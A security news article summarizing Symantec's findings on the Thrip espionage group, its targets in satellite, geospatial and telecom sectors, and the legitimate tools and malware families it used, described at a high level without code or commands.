Attackers used a combination of custom malware and legitimate system process yo hide their activity and to reduce the risk of discovery.
Security researchers from Symantec uncovered the reemerged Thrip campaign, “We identified three computers in China being used to launch the Thrip attacks. Thrip’s motive is likely espionage and its targets include those in the communications, geospatial imaging, and defense sectors, both in the United States and Southeast Asia.”
With the latest campaign attackers changed their tactics, they used a mixture of custom malware and open source tools. The custom malware is designed to steal information from an infected computer, including login credentials.
Thrip Hacker Group Target
Thrip targets include communications, geospatial imaging, and defense sectors, both in the United States and Southeast Asia.
The hacker group target’s the production unit’s of the target sector’s, they look to deploy the malware on computer’s used to monitor and control satellites.
Their another target was the organization deals with geospatial imaging and mapping, with this attack also they looked for deploying malware on the operational side. They targetted computers running MapXtreme GIS (Geographic Information System) software.
With another attacker, they targeted three different telecoms operators based in Southeast Asia and with all the hack attacks they targeted operational side only.
Tools and Custom malware
According to Symantec, the Thrip Hacker Group switched to a mixture of custom malware and legitimate tools in this most recent wave of attacks from 2017.
Legitimate tools abused by Thrip Hacker Group
PsExec: Microsoft Sysinternals tool for executing processes on other systems. The tool was primarily used by the attackers to move laterally on the victim’s network.
PowerShell: Microsoft scripting tool that was used to run commands to download payloads, traverse compromised networks, and carry out reconnaissance.
Mimikatz: Freely available tool capable of changing privileges, exporting security certificates, and recovering Windows passwords in plaintext.
WinSCP: Open source FTP client used to exfiltrate data from targeted organizations.
LogMeIn: Cloud-based remote access software. It’s unclear whether the attackers gained unauthorized access to the victim’s LogMeIn accounts or whether they created their own.
Trojan.Rikamanu: A custom Trojan designed to steal information from an infected computer, including credentials and system information.
Infostealer.Catchamas: Based on Rikamanu, this malware contains additional features designed to avoid detection. It also includes a number of new capabilities, such as the ability to capture information from newer applications (such as new or updated web browsers) that have emerged since the original Trojan.Rikamanu malware was created.
Trojan.Mycicil: A keylogger is known to be created by underground Chinese hackers. Although publicly available, it is not frequently seen.
Backdoor.Spedear: Although not seen in this recent wave of attacks, Spedear is a backdoor Trojan that has been used by Thrip in other campaigns.
Trojan.Syndicasec: Another Trojan used by Thrip in previous campaigns.
Symantec published analysis report along with IOCs associated with the incident.